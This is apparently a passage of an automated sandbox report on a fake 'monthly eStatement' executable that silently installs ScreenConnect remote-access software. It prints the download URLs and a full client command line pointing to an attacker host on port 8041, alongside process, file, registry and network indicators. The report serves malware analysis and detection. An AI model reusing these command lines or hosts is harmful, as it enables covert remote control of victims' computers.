                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exed
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config:
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.2981594079.0000025D37CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49736 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: monthly-eStatementForum120478962.Client.exePE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009AA4950_2_009AA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F59D7D2_2_00007FF848F59D7D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4AF4F2_2_00007FF848F4AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F6B21D2_2_00007FF848F6B21D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F533B12_2_00007FF848F533B1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F5D5992_2_00007FF848F5D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F527582_2_00007FF848F52758
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F460102_2_00007FF848F46010
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F630F12_2_00007FF848F630F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F412112_2_00007FF848F41211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4F4412_2_00007FF848F4F441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F628382_2_00007FF848F62838
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F170BA12_2_00007FF848F170BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F110CF12_2_00007FF848F110CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F110D712_2_00007FF848F110D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF849226A0812_2_00007FF849226A08
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF84922595112_2_00007FF849225951
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF8492201D012_2_00007FF8492201D0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF849226A6B12_2_00007FF849226A6B
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@18/76@2/2
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCommand line argument: dfshim0_2_009A1000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
